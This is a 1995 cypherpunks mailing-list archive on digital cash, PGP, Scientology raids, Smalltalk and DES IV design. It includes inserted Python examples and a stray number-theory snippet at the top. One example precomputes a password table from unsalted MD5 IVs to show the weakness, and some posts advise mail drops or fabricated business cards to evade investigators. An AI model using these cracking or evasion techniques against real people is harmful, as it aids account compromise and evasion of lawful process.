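    n, factors = 35, (5, 7)
    for a in (29, 11, 3, 2):
        print(a, "jacobi", jacobi(a, n), "roots", square_roots(a, n),
              "residue", is_residue(a, factors))
    print("Jacobi +1 but no square root:", jacobi_false_positives(n, factors))
```
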





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Mon, 14 Aug 95 19:44:23 PDT
To: hallam@w3.org
Subject: Re: An article for Wired magazine
In-Reply-To: <9508150158.AA12834@zorch.w3.org>
Message-ID: <199508150244.WAA19899@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> The problem with Chaum's work is that it is unbalanced. He considers
> only the privacy aspect. The prevention of extortion aspect he does
> not consider.  DigiCash have never addressed the baby-napping
> protocol problem as far as I am aware.

DigiCash as defined makes it trivial to trace cash you give to someone
provided there is collusion between the payer and the bank. Doesn't
that solve the baby-napping problem?

Incidentally, so far as I know, there is no physical world way to solve
the babynapping problem. Hell, you can just demand a case with five
kilos of gold in it if $50,000 in cash doesn't suit your tastes. I
defy governments to eliminate gold as well as paper currency.

> Governments have certain rights in our society that individuals do
> not. This is justified by their being democratically accountable.

Let's not get into a political discussion, but many of us here would
deny the legitimacy of authoritarianism simply on the basis that a
majority of the tiny minority that votes decided to vote for it.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Mon, 14 Aug 95 21:21:23 PDT
To: agent@agents.com
Subject: Re: You are being monitored
In-Reply-To: <199508150404.AAA04907@qks.com>
Message-ID: <Pine.BSI.3.91.950814232006.11402A-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Whois yielded this:

[usr5.primenet.com] (carolab): whois agents.com
Software Agents (AGENTS-DOM)
   12236 Brittania Cir
   Germantown, MD 20874
 
   Domain Name: AGENTS.COM
 
   Administrative Contact:
      Houston, Bob  (BH55)  rkh@ACCESS.DIGEX.NET
      (301) 601-4362
   Technical Contact, Zone Contact:
      Kern, Edward  (EK6)  ejk@DIGEX.NET
      800-969-9090 301-847-5000 (FAX) 301-847-5215
 
   Record last updated on 10-Jan-94.




On Mon, 14 Aug 1995 agent@agents.com wrote:

> 
> If anybody can determine who this came from pleez post a guess.
> 
> This is an experiment from inside a program environment. I am serious.
> 
> 
> 
> -- Tim May
> 

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 15 Aug 95 05:32:27 PDT
To: cypherpunks@toad.com
Subject: CAT_tal
Message-ID: <199508151232.IAA25456@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-15-95. NYPaper. [fundie lab-work for quantum 
cryptomorrow.]


   "It's a Molecule. No, It's More Like a Wave. In theory, an
   amoeba can behave as a wave and interfere with itself. In
   a university laboratory, a subatomic search for
   Schrodinger's Cat."

      Scientists at the Massachusetts Institute of Technology
      recently completed an experiment that proves that an
      object at least as large as a molecule can be made to
      act like a light wave -- forcibly split into two
      component waves and separately manipulated, altered,
      recombined and analyzed. Dr. David E. Pritchard and his
      colleagues at M.I.T. remind skeptics that quantum theory
      permits any object to behave as either a particle or a
      wave, depending on how it is viewed. Dr. Pritchard's
      research and that of other teams around the world
      represent an explosion of scientific interest in
      interferometry, a centuries-old technique by which waves
      are split and made to interfere with themselves,
      revealing details of nature that are otherwise hidden.
      With a brilliant history of discovery behind it,
      interferometry seems poised for a new golden age.


   CAT_tal (about 15kb)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 15 Aug 95 06:19:29 PDT
To: futplex@pseudonym.com (Futplex)
Subject: Re: CoS Raid on "Copyright Terrorist"
Message-ID: <199508151319.JAA18056@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:28 AM 8/14/95 -0400, Futplex wrote:
>Some CoS news:
>
>This past Saturday (95/08/12) a prominent Church of Scientology litigator,
>Helena Kobrin, and some U.S. federal marshals raided the home of Arnaldo
>Lerma, seizing pretty much all his computer hardware, disks, etc.

So why is it that people insist on listing their home addresses with their
ISPs rather than a mail receiving service or something else?  It is very
hard to raid a mail drop and obtain anything useful.  While it is true that
if you blow up buildings, the Fibbies may be able to find you, quite simple
techniques can frustrate even quite dedicated private parties.

DCF

"We warned you mental defectives back in '65 that the socialized medicine
offered by Medicare and Medicaid would be expensive, lousy, and eventually
not there at all but you didn't believe us.  Good luck."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 15 Aug 95 09:29:48 PDT
To: cypherpunks@toad.com
Subject: Smalltalk Musings
Message-ID: <ac56121a01021004fc51@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I have a few musings on Smalltalk and its possible role in themes of
interest to many of us. First, a comment on the "mailer" I tried last
night:

At 2:24 PM 8/15/95, Mats Bergstrom wrote:
>> The manufacturer is apparently acting as the collection point, and any name
>> can be put into the From: field.
>
>Then, effectively, Quasar is a new(?) kind of remailer.
>There was no got.net in the headers I could see. The
>next question is how they log incoming agents.

I discovered that the "-- Tim May" added to the end was by them, not me.
Just coincidence that I usually add "--Tim May" or "-- Tim May" before my
automatic sig block.

This was an experimental mailer included--"for educational purposes"--in
the latest Developer's Release of SmalltalkAgents. It has a few specific
things hardwired into it, such as using qks.com as its SMTP server.

Not a very effective remailer, as nothing cryptographically strong is
included. However, it shows that more and more languages and environments
are "speaking TCP/IP" and that integration of this stuff into high level
language environments is here. Java and HotJava do similar things, perhaps
even more powerfully. And obviously Unix/Linux tools are the standard here.

A few words on Smalltalk, an old language that is gaining in popularity.

(Smalltalk is doing pretty well for large projects. Several banks and
trading firms have aggressive Smalltalk programs, preferring it to C++ for
large, object-oriented projects. The company behind NetBank and NetCash,
SoftwareAgents, is using SmalltalkAgents. The leader in Smalltalk is of
course ParcPlace, which recently merged with Digitalk. Lots of info is
available on Smalltalk on the Web.)

The richness of Smalltalk lies in the extensive class libraries. Everything
is an object, no exceptions. (My personal interest--my asbestos suit is now
on--is in looking at economic exchanges and finding the classes and
methods, sort of "the ontology of money," and working on implementing
them.)

A few words of history. Most of you know that the current "graphical user
interface" (GUI) of the Macintosh and (more recently) Windows and X, etc.,
goes back to two main sources: the Xerox work by Alan Kay, Dan Ingalls,
and others on Smalltalk and the Xerox and MIT work on Lisp Machines. The
machines from Xerox Parc in the late 70s had the features we now think of
as central: bit-mapped screen, windows, menus, pop-up dialogs, mouse and
movable cursor, variable fonts, etc. (And the Xerox Parc folks were of
course influenced by the work of others, including Doug Engelbart at
Stanford Research Institute and the object-oriented language Simula.)

I'm not advocating that anyone use Smalltalk. Use what feels right, or what
your companies and groups expect. C++ is without doubt the most popular.
But diversity is good, so Python, Java, C+@, TCL, Lisp, Smalltalk, Perl,
Eiffel, Scheme, and even REXX all have roles to play, especially in specific
situations. If Tim Berners-Lee and Marc Andreessen had dropped "hypertext"
when it was "dead and buried," where would we be today?

More info on SmalltalkAgents and their other products can be found at
http://www.qks.com/ . The Macintosh version is currently their only
supported platform, with a Windows NT (maybe Win '95, but doubtful) version
due later this year, and various Unix versions due after that.

They have some advances over ParcPlace's VisualWorks, but their longterm
success is not assured. Nor is my longterm success assured. :-}


-TCM





---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Tue, 15 Aug 95 06:52:43 PDT
To: cypherpunks@toad.com
Subject: Use of the IV in DES & stuffing the first block w/ random stuff
Message-ID: <JAA01935.199508151352@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


I have recently started writing a small pair of encryption and
decryption programs.  I was planning on generating the key by
taking the MD5 of the text password supplied by the user.

Seeing that I have 64 bits left over (MD5 gives me 128 bits, single
DES needs 56, triple DES needs 168 - so I have a bit over 64 bits
left in both cases), is there anything useful that I could do with
them?

Does setting the IV (normally left at zero) buy me anything?

Does cramming it into the first data block help protect me from
known plaintext attacks?  (I was going to use CBC so unless they
know the first block they can't use a known plaintext attack,
right?)

Or am I better off putting the extra 64 bits of "key" into the IV,
and generating a strong random number to stuff in the first block
- since the decoder can just ignore that block anyway.

(or should I ignore the IV, and stuffing random crud in the first
block?)

I don't recall Applied Crypto. addressing these issues, but if I
just managed to forget can someone remind me what chapter I need
to re-read?
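
Added example (not part of the original message): the IV choices asked about above, compared by how many leading ciphertext blocks two messages share when they are encrypted under the same password and begin with the same text. Python's standard library has no DES, so a toy 64-bit Feistel cipher stands in for it (an assumption; only the CBC chaining matters here), and the mode names, sample messages and password are constructed for illustration.

```python
import hashlib
import os

BLOCK = 8  # 64-bit blocks, the DES block size

# Constructed sample messages: identical for the first 35 bytes.
MSG_A = b"From: alice@example.test\nBody: pay 100"
MSG_B = b"From: alice@example.test\nBody: pay 999"


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(half: bytes, key: bytes, rnd: int) -> bytes:
    # Round function of the toy Feistel cipher (stand-in for DES, not DES).
    return hashlib.md5(key + bytes([rnd]) + half).digest()[:4]


def encrypt_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:4], block[4:]
    for rnd in range(8):
        l, r = r, _xor(l, _f(r, key, rnd))
    return l + r


def decrypt_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:4], block[4:]
    for rnd in reversed(range(8)):
        l, r = _xor(r, _f(l, key, rnd)), l
    return l + r


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    n = BLOCK - len(plaintext) % BLOCK          # PKCS#7-style padding
    data = plaintext + bytes([n]) * n
    prev, out = iv, b""
    for i in range(0, len(data), BLOCK):
        prev = encrypt_block(key, _xor(data[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    prev, out = iv, b""
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out += _xor(decrypt_block(key, blk), prev)
        prev = blk
    n = out[-1]
    if not 1 <= n <= BLOCK or out[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return out[:-n]


def derive(password: str):
    # As in the post: MD5 of the password, split into key and 64 spare bits.
    d = hashlib.md5(password.encode()).digest()
    return d[:8], d[8:]


def seal(password: str, plaintext: bytes, mode: str) -> bytes:
    key, spare = derive(password)
    if mode == "zero_iv":                       # IV left at zero
        return cbc_encrypt(key, bytes(BLOCK), plaintext)
    if mode == "password_iv":                   # spare MD5 bits used as the IV
        return cbc_encrypt(key, spare, plaintext)
    if mode == "random_iv":                     # fresh IV, sent in the clear
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(key, iv, plaintext)
    if mode == "random_first_block":            # spare bits as IV + random block
        return cbc_encrypt(key, spare, os.urandom(BLOCK) + plaintext)
    raise ValueError(mode)


def unseal(password: str, blob: bytes, mode: str) -> bytes:
    key, spare = derive(password)
    if mode == "zero_iv":
        return cbc_decrypt(key, bytes(BLOCK), blob)
    if mode == "password_iv":
        return cbc_decrypt(key, spare, blob)
    if mode == "random_iv":
        return cbc_decrypt(key, blob[:BLOCK], blob[BLOCK:])
    if mode == "random_first_block":
        return cbc_decrypt(key, spare, blob)[BLOCK:]   # decoder drops block 1
    raise ValueError(mode)


def leaked_blocks(mode: str, password: str = "correct horse") -> int:
    """Leading ciphertext blocks that are identical for MSG_A and MSG_B."""
    a, b = seal(password, MSG_A, mode), seal(password, MSG_B, mode)
    count = 0
    for i in range(0, min(len(a), len(b)), BLOCK):
        if a[i:i + BLOCK] != b[i:i + BLOCK]:
            break
        count += 1
    return count


if __name__ == "__main__":
    for m in ("zero_iv", "password_iv", "random_iv", "random_first_block"):
        print(f"{m:20s} identical leading blocks: {leaked_blocks(m)}")
```

An IV that is fixed for a given password, whether zero or taken from the spare hash bits, lets an observer see that two ciphertexts start with the same plaintext; a per-message random IV or random first block removes that, and the two are equivalent in effect because the first ciphertext block then serves as the chaining value for the rest.
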




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Tue, 15 Aug 95 06:59:50 PDT
To: cypherpunks@toad.com
Subject: The Spotlight
In-Reply-To: <Pine.SOL.3.91.950814213252.29712A-100000@use.usit.net>
Message-ID: <Pine.3.89.9508150904.R26620-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry, just a brief correction to the original file

> From: Duncan Frissell <frissell@panix.com>
> To: cypherpunks@toad.com
> Subject: Phone Card Risks
> 
> One of the plethora of TV Magazine shows featured Tim McVeigh and phone
> cards last week.  Maybe I should post to Risks.
> 
> According to the story, Tim McVeigh bought a bunch of phone cards from "The
> Spotlight" (famous Klan paper)

	The Spotlight is more of a rogue faction CIA/FBI 
Constitutionalist paper than a Klan paper, by my reckoning. Sources 
available on request.	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 15 Aug 95 10:48:06 PDT
To: kutek@ios.com (No Name)
Subject: Re: VIACRYPT
Message-ID: <199508151744.KAA08566@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 AM 8/15/95 -0400, No Name wrote:
>Does anyone know if PKZ gets any royalties from the sale of Viacrypt-
>it is after all his code, isn't it?  Or is the Viacrypt source entirely
>different ?
>Speaking of which code, has Viacrypt been "verified" in any way by
>some independent agency?

The RSA code in ViaCrypt 2.4 is different from the PGP code; most of the
rest is the same.  The documentation includes a note from Phil,
and I think the code is signed by him.  You can trust it.  As far as money goes,
I don't know their financial arrangements.  My copy has a pretty low serial
number; I hope they've sold enough to make some bucks.

The Windows version of 2.7.1 is substantially different - it's got a GUI interface,
with a shell-like piece underneath that looks more like vanilla PGP. 
The Preface says it's using ViaCrypt's DigiSig+ RSA implementation,
the IDEA implementation is licensed from Ascom-Tech AG,
the compression code is from Info-Zip by Mark Adler and Jean-loup Gailly,
and they've licensed Phil Zimmermann's PGP(tm) for the remainder.
They also acknowledge that lots of people contributed,
including Branko Lankester and Peter Gutmann.
The code is signed by ViaCrypt, and their key is signed by Phil.
The documentation is substantially rewritten, mostly for the GUI part.
The examples are somewhat amusing (removing a signature from a key
for Bill Haydon <bill@5thfloor.circus.com> ....)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 15 Aug 95 10:47:52 PDT
To: Kev <KEVIN@sia-corp.demon.co.uk>
Subject: Re: My pseudo-anonymous dream list (fwd)
Message-ID: <199508151744.KAA08592@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:26 PM 8/15/95 GMT0BST, Kev wrote:
>> I've heard this criticism of PGP before, but I don't quite understand it.
>> PGP is free.   Why not just upgrade to version 2.6?
>
>Easy to say, not so easy to do if you're outside the USA/Canada. 

Quite easily done.  ftp.ox.ac.uk has a good collection of PGP versions.
(Oh, no!  Somehow these crafty foreigners managed to smuggle munitions out of
the country right under the nose of our intelligence services! :-)
PGP 2.6.i was written to be a 2.6-compatible version for non-US use,
or you can use the 2.6.2 source code with RSAEuro instead of RSAREF
and not violate your government's copyright rules.

The reason PGP 2.6 is incompatible with 2.4 and earlier versions is
that it let MIT make PKP happier about letting them use RSAREF,
which gave them patent-legitimacy in the US.  (Incompatibilities
between earlier versions could be blamed on gratuitous attempts
at standards-compatibility...)

>However my point may be underlined by a little example :-
[Example deleted.]  Also, the code has been set up so that new versions
can read files written by old versions, and can write files in
old-format when needed; I assume the developers will continue this
approach any time they make incompatible changes.

But the big differences in 3.0 will be libraryizing the code -
one effect is that people will be able to build their own PGP-based tools
more easily than before, but aren't forced to include the whole package,
so people may end up building incompatible parts using the libraries.
Some of this is unavoidable - e.g. an encrypted telnet won't talk to a
batch file encryptor, but they should still be using the same signature code
for session-keys (or DH-halfkeys).

#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kutek@ios.com (No Name)
Date: Tue, 15 Aug 95 09:43:34 PDT
To: cypherpunks@toad.com
Subject: VIACRYPT =money for Phil Z ???
Message-ID: <2NLMwQSYSH4F084yn@ios.com>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know if PKZ gets any royalties from the sale of Viacrypt-
it is after all his code, isn't it?  Or is the Viacrypt source entirely
different ?
Speaking of which code, has Viacrypt been "verified" in any way by
some independent agency?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 15 Aug 95 08:02:12 PDT
To: hallam@w3.org
Subject: Re: An article for Wired magazine
In-Reply-To: <9508150158.AA12834@zorch.w3.org>
Message-ID: <199508151501.LAA12164@bwnmr5.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


P Hallam wrote:

| The major problem with DigiCash is the patent portfolio. I don't
| much like the idea of David Chaum replacing the government as the
| controller of the money supply. Sorry, I just don't.

	Remember that the patents only last 17 years.  (A few more,
since some of the major ones are staggered, but not a long time.
Governments tend to last longer than that.)



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Tue, 15 Aug 95 11:15:22 PDT
To: cypherpunks@toad.com
Subject: Re: VIACRYPT =money for Phil Z ???
In-Reply-To: <2NLMwQSYSH4F084yn@ios.com>
Message-ID: <WKOMwkkAseqE084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 15 Aug 1995 10:47:18 -0400, kutek@ios.com (No Name) wrote:

> Does anyone know if PKZ gets any royalties from the sale of Viacrypt-
> it is after all his code, isn't it?  Or is the Viacrypt source entirely
> different ?

He gets a small royalty.  I glanced at the August '95 "Internet World"
article without buying the mag :-) and in it prz says his ViaCrypt
royalty doesn't even pay his phone bill.  (Dunno how much his phone
bill is, tho.)


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 15 Aug 95 09:29:24 PDT
To: cypherpunks@toad.com
Subject: PCryptoids
Message-ID: <199508151629.MAA16751@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   A couple of cryptoids from PC Mag, 9-12-95:


   [Review excerpts] *Network Security, Private Communication in
   a Public World*, review by O. Ryan Tabibian

   The book is grouped into three parts: "Cryptography,"
   "Authentication," and "Electronic Mail." There is also a
   "Leftover" section, which covers security with popular
   network operating systems such as Microsoft Windows NT and
   NetWare.

   Most books fail to cover the difficult subject of
   cryptography effectively. *Network Security*, however,
   clearly describes the different cryptography methods --
   such as secret key, hashing, and public-key cryptography --
   as well as a variety of other technologies, including
   Diffie-Hellman and RSA.

   The second section, "Authentication," deals with how a
   system or persons you are communicating with can verify
   your identity. Verification schemes range from simple
   passwords to complex digital signatures. The authors do a
   remarkable job of describing and analyzing the variety of
   authentication methods.

   Since the majority of your access to the outside world is
   through e-mail, your messages are probably most vulnerable.
   The book covers some of the popular e-mail security
   schemes, such as public key and privacy-enhanced mail. A
   brief overview of X.400 is also included.

   Overall this is perhaps the most comprehensive, yet
   easiest-to-understand book covering network security
   available.

   Network Security, Private Communication in a Public World,
   by Charlie Kaufman, Radia Perlman, and Mike Speciner,
   $46.00. Prentice Hall PTR, 800-947-7700; ISBN:
   0-13-061466-1.

-----------

   [Then, Bill Machrone muses on the utility of electronic
   business cards. Excerpts:]

   Some of my correspondents want a magnetic stripe on the
   business card, pretty much like the one on your credit
   cards. Others want a bar code. Assuming that you don't use
   the back of your card for an alternative language, you've
   got several square inches back there, plenty of room for
   data.
             
   What will we use it for? The database stuff is the easy and
   obvious part. Since the computer industry and IS
   departments are likely to be the earliest adopters, it
   would be a simple matter to standardize on a format that
   the reader spits out for easy importation into just about
   anything. If the software and I/O devices are cheap enough,
   the rest of the world will come along -- and benefit.

   Authentication is a potentially huge application. In some
   South American countries, fraudulent representation is
   common. Crooks collect business cards from legitimate
   businesspeople and then misrepresent themselves to
   perpetrate a variety of scams. As a result, businesspeople
   commonly tear a corner of their card as they hand it to
   you. You don't trust a card that wasn't torn in front of
   you.

   A more elegant solution lies in a new Kodak technology that
   can encode your likeness in as little as 500 bytes,
   readable by your PDA, notebook, or desktop machines. You
   could also include a machine-readable version of your
   public encryption key, making it easy for people to send
   you secure communications.

----------











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 15 Aug 95 11:18:29 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: CoS Raid on "Copyright Terrorist"
In-Reply-To: <199508151319.JAA18056@panix.com>
Message-ID: <9508151817.AA03464@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
 > Nowadays, a $10-20/mo maildrop at places like "Mailboxes, Etc" works fine.

Mailboxes Etc. insists on getting a picture ID; at least they did last
time I checked.  Some smaller mom&pop places will take a business card
(time to break out your Jim Rockford Business Card Fabrication Kit).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 15 Aug 95 13:44:22 PDT
To: "Josh M. Osborne" <stripes@va.pubnix.com>
Subject: Re: Use of the IV in DES & stuffing the first block w/ random stuff
Message-ID: <199508152039.NAA15590@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:52 AM 8/15/95 -0400, you wrote:
>I have recently started writing a small pair of encryption and
>decryption programs.  I was planning on generating the key by
>taking the MD5 of the text password supplied by the user.

A reasonable approach, but be careful in your implementation.
I haven't seen the book "A Million Wimpy Passwords and their MD5s" yet,
but the CD-ROM version may be out soon :-)  And you can probably
ftp it from dockmaster.

>Seeing that I have 64 bits left over (MD5 gives me 128 bits, single
>DES needs 56, triple DES needs 168 - so I have a bit over 64 bits
>left in both cases), is there anything useful that I could do with them?
>
>Does setting the IV (normally left at zero) buy me anything?

IVs are designed to let you put random stuff in them to discourage
known-plaintext attacks, replay attacks, etc.   However, suppose you
take a known 64 bits from MD5(password) and put them in the IV -
instead of the Bad Guy needing to brute-force 168-bit-deep Triple DES,
he gets to brute force MD5s of human-selected passwords instead,
which makes a lot of pre-computation possible.

Also, for 3-Key Triple-DES, how do you get 168 bits of key from
128 bits of MD5?  (for 2-Key 3-DES, you only need 112 bits...)
If you do something like M1=MD5(Key), M2=MD5(M1,Key), realize 
you've got at most 128 bits of real key instead of 168, 
though that probably needn't worry you too much...

>Does cramming it into the first data block help protect me from
>known plaintext attacks?  (I was going to use CBC so unless they
>know the first block they can't use a known plaintext attack, right?)  
Won't hurt, as long as you remember to remove it on the decrypt-end.

>Or am I better off putting the extra 64 bits of "key" into the IV,
>and generating a strong random number to stuff in the first block
>- since the decoder can just ignore that block anyway.
Put the strong random number in the IV, if you've _got_ a source
of strong random numbers...

You might want to do something fancy like choose a random salt,
use the salt for the IV, and use MD5(salt,human-selected-key) for the key.
This makes pre-computation much less useful (unless you're careless
and use MD5(key,salt) instead of MD5(salt,key)...), and means that
you use a different session key for each batch of stuff you encrypt,
even though you're using the same key.  If you're paranoid about replay
attacks, you could let some of the bits of the salt be random and some 
be a counter, and never accept a key smaller than the one from the
previous successfully-decrypted message.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry
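
The two designs compared in the reply above, as an added example that is not part of the original message: the key and IV both cut from MD5(password), against a random salt used as the IV with MD5(salt, password) as the key, plus the counter-in-the-salt replay check. The 4-random-byte plus 4-byte-counter salt layout, plain concatenation for MD5(salt, password), reading "never accept a key smaller" as a counter comparison, and all names and the wordlist are assumptions; the DES-CBC step itself is left out.

```python
import hashlib
import os
import struct

# Constructed sample data: a tiny wordlist and one user's password.
WORDLIST = [b"password", b"letmein", b"trustno1", b"swordfish"]
PASSWORD = b"swordfish"


def unsalted_params(password: bytes):
    """Plan from the question: key = first 64 bits of MD5(password)
    (DES ignores the parity bit of each byte), IV = the 64 bits left over.
    The IV travels in the clear with the ciphertext."""
    digest = hashlib.md5(password).digest()
    return digest[:8], digest[8:]


def precompute_iv_table(wordlist):
    """One-time table IV -> password. It is valid for every user and every
    message of the unsalted design, which is the pre-computation risk."""
    return {unsalted_params(word)[1]: word for word in wordlist}


def make_salt(counter: int) -> bytes:
    """Assumed layout: 4 random bytes followed by a 4-byte big-endian counter."""
    return os.urandom(4) + struct.pack(">I", counter)


def salted_params(password: bytes, salt: bytes):
    """Suggested scheme: key = MD5(salt, password), IV = salt."""
    key = hashlib.md5(salt + password).digest()[:8]
    return key, salt


class ReplayError(Exception):
    """Raised when a message's counter does not advance."""


class Receiver:
    """Derives the per-message key and refuses counters that do not advance."""

    def __init__(self, password: bytes):
        self.password = password
        self.last_counter = -1

    @staticmethod
    def counter_of(iv: bytes) -> int:
        return struct.unpack(">I", iv[4:8])[0]

    def key_for(self, iv: bytes) -> bytes:
        counter = self.counter_of(iv)
        if counter <= self.last_counter:
            raise ReplayError(f"counter {counter} is not above {self.last_counter}")
        return salted_params(self.password, iv)[0]

    def confirm(self, iv: bytes) -> None:
        """Call only after the message decrypted successfully."""
        self.last_counter = self.counter_of(iv)


def demo():
    table = precompute_iv_table(WORDLIST)

    # Unsalted: the public IV alone identifies the password.
    _, leaked_iv = unsalted_params(PASSWORD)
    recovered = table.get(leaked_iv)

    # Salted: same password, two messages, two unrelated keys and IVs.
    key1, iv1 = salted_params(PASSWORD, make_salt(1))
    key2, iv2 = salted_params(PASSWORD, make_salt(2))

    rx = Receiver(PASSWORD)
    for iv in (iv1, iv2):
        rx.key_for(iv)
        rx.confirm(iv)
    try:
        rx.key_for(iv1)          # captured first message sent again
        replay_rejected = False
    except ReplayError:
        replay_rejected = True

    return {
        "recovered_from_unsalted_iv": recovered,
        "salted_iv_in_table": iv1 in table or iv2 in table,
        "keys_differ": key1 != key2,
        "replay_rejected": replay_rejected,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The salt stops one table from serving every message, but each guess still costs a single MD5; a current design would derive the key with a deliberately slow password hash such as scrypt or PBKDF2.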





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 15 Aug 95 11:01:36 PDT
To: frissell@panix.com (Duncan Frissell)
Subject: Re: CoS Raid on "Copyright Terrorist"
In-Reply-To: <199508151319.JAA18056@panix.com>
Message-ID: <199508151800.OAA07537@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 09:28 AM 8/14/95 -0400, Futplex wrote:
> >Some CoS news:
> >
> >This past Saturday (95/08/12) a prominent Church of Scientology litigator,
> >Helena Kobrin, and some U.S. federal marshals raided the home of Arnaldo
> >Lerma, seizing pretty much all his computer hardware, disks, etc.
> 
> So why is it that people insist on listing their home addresses with their
> ISP's rather than a mail receiving service or something else.  It is very
> hard to raid a mail drop and obtain anything useful.  While it is true that
> if you blow up buildings, the Fibbies may be able to find you, quite simple
> techniques can frustrate even quite dedicated private parties.

  One of the reasons I used to receive all my mail at the "FSF" machines
(GNU.AI.MIT.EDU) was because I had a completely anonymous account. I had
the GNU account long before the FSF started registering people's 
name/phones, and I used to telnet into GNU from several completely
open annexes in Maryland. (the colleges would allow you to simply
telnet from the terminal server to anywhere with no restrictions.
This was back in 88-89 when the internet wasn't as big. Of course,
they shut it off later when outside users started busying up
the lines) And since I had root on the system, I could delete the
